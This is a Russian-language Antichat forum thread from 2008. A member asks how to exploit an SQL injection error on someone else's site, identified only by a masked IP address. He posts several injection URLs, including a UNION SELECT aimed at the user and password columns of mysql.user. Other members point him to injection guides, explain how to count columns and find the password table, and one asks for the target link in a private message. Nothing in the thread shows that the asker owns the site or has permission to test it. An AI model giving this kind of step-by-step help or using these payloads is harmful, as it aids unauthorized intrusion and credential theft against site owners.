Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Какие уязвимости могут быть? |
02.01.2008, 11:58
|
|
Познающий
Регистрация: 10.11.2007
Сообщений: 36
Провел на форуме:
198117
Репутация:
5
|
|
Какие уязвимости могут быть?
Какие уязвимости могут быть у обычного локального сайта не php nuke не joomla а которые сами писали  
Вообщем есть сайт http://***.***.**.**/
пишу http://***.***.**.**/movie.php?id=1 нечего...
а стоит прописать
http://***.***.**.**/movie.php?id=1%60
появляеться
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/movie.php on line 198
Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /var/www/movie.php on line 199
Что могу сделать? 
И есть ещё один сайт там вообще нету уязвимостей ну хз вот примерно
http://***.***.**.**/files/rules.htm - обычная страница а пишеш http://***.***.**.**/ без "rules.php"! Там файлы "lol.php~","a.super" ну т.е. всё чо включены в сайты даже заходиш весь код html виден =)
(Что можно сделать по двум разным сайтам,ЗАРАНЕЕ ОГРОМНОЕ СПАСИБО)!  |
|
|
02.01.2008, 12:02
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548
Репутация:
1942
|
|
по первому читай:
https://forum.antichat.ru/threadnav43966-1-10.html
https://forum.antichat.ru/threadnav19605-1-10.html
|
|
|
|
02.01.2008, 12:44
|
|
Познающий
Регистрация: 10.11.2007
Сообщений: 36
Провел на форуме:
198117
Репутация:
5
|
|
Сообщение от BlackCats
по первому читай:
https://forum.antichat.ru/threadnav43966-1-10.html
https://forum.antichat.ru/threadnav19605-1-10.html
куль статейки! Только сравно нехера неполучаеться...
http://xxx/movie.php?id=-1 нечего нету
http://xxx/movie.php?id=9999999 нечего нету
пишу опять http://xxx/movie.php?id=1' UNION SELECT 1,2,3,4,5,6 -- ошибка таже
пишу http://xxx/movie.php?id=0 ошибок нету
http://xxx/movie.php?id='1'; ошибка
пишу http://xxx/movie.php?page=-1+union+select+null,null/* ошибка
пишу http://xxx/movie.php?page=99999+union+select+null,null/*
page=-1+union+select+null,null,null,null,null,null/* ошибка
http://xxx/movie.php?page=-1+union+select+1,2,user,password,5,6+from+mysql.us er/* нечего не проиходит
тажа ошибка...
|
|
|
|
02.01.2008, 12:53
|
|
Познающий
Регистрация: 02.02.2007
Сообщений: 78
Провел на форуме:
1514596
Репутация:
49
|
|
ты количество столбцов правильно подбери(ссылки на маны по этому у тебя уже есть), а потом и имя таблицы с пассами. а то ты как-то от фонаря всё делаешь.
|
|
|
|
02.01.2008, 13:35
|
|
Познающий
Регистрация: 10.11.2007
Сообщений: 36
Провел на форуме:
198117
Репутация:
5
|
|
так пишу ' Group By 99999 -- сравно одна и тажа ошибка сколько там миллион столбцов =) ?
(сор если я тупой вопрос задал) |
|
|
|
02.01.2008, 18:41
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
кинь ссылку сюда или в пм
__________________
|
|
|
|
02.01.2008, 19:01
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548
Репутация:
1942
|
|
так пишу ' Group By 99999 -- сравно одна и тажа ошибка сколько там миллион столбцов =) ?
если ошибка - это значит МЕНЬШЕ
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
